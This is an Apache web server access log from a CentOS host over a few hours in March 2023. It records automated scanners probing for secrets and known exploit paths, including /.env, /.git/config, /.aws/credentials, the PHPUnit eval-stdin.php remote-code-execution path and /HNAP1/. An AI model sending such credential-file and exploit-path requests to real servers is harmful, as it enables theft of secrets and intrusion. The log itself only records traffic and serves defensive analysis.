::1 - - [29/Mar/2023:22:29:17 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:18 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:19 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:20 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:21 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:22 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:23 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:24 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:25 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [29/Mar/2023:22:29:26 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
34.228.162.129 - - [29/Mar/2023:22:33:56 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.25.1"
193.32.162.159 - - [29/Mar/2023:22:40:39 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.154.128.189 - - [29/Mar/2023:23:25:31 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
86.48.11.239 - - [29/Mar/2023:23:44:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148"
135.125.217.54 - - [29/Mar/2023:23:45:51 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [29/Mar/2023:23:45:52 +0000] "POST / HTTP/1.1" 405 409723 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
194.5.53.100 - - [29/Mar/2023:23:53:35 +0000] "GET /.aws/credentials HTTP/1.1" 200 - "-" "python-httpx/0.23.3"
179.43.177.242 - - [29/Mar/2023:23:55:53 +0000] "GET / HTTP/1.1" 200 41226 "-" "Hello World"
198.235.24.154 - - [30/Mar/2023:00:20:02 +0000] "\x16\x03\x01" 400 226 "-" "-"
35.87.82.70 - - [30/Mar/2023:00:31:09 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
35.87.82.70 - - [30/Mar/2023:00:31:10 +0000] "POST / HTTP/1.1" 405 409778 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
35.87.82.70 - - [30/Mar/2023:00:31:12 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "python-requests/2.28.2"
43.154.128.189 - - [30/Mar/2023:00:43:58 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.217.54 - - [30/Mar/2023:00:50:12 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.217.54 - - [30/Mar/2023:00:50:12 +0000] "POST / HTTP/1.1" 405 409743 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.81.243.34 - - [30/Mar/2023:01:04:38 +0000] "GET / HTTP/1.1" 200 41226 "-" "-"
45.81.243.34 - - [30/Mar/2023:01:04:39 +0000] "POST /HNAP1/ HTTP/1.1" 301 235 "-" "Mozila/5.0"
